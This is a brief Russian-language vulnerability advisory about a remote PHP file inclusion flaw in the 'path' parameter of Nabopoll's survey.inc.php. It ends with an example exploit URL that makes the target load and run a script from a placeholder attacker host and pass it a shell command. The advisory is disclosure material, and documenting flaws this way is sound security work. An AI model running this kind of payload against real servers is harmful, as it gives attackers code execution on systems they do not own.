Программа: Nabopoll
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе с привилегиями
web сервера. Уязвимость существует из-за
недостаточной проверки входных данных в
параметре 'path' сценария 'survey.inc.php'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
PHP сценарий на целевой системе.
Пример:
http://[target]/nabopoll/survey.inc.php?path= http://[attacker]/test/xpl.php?cmd=id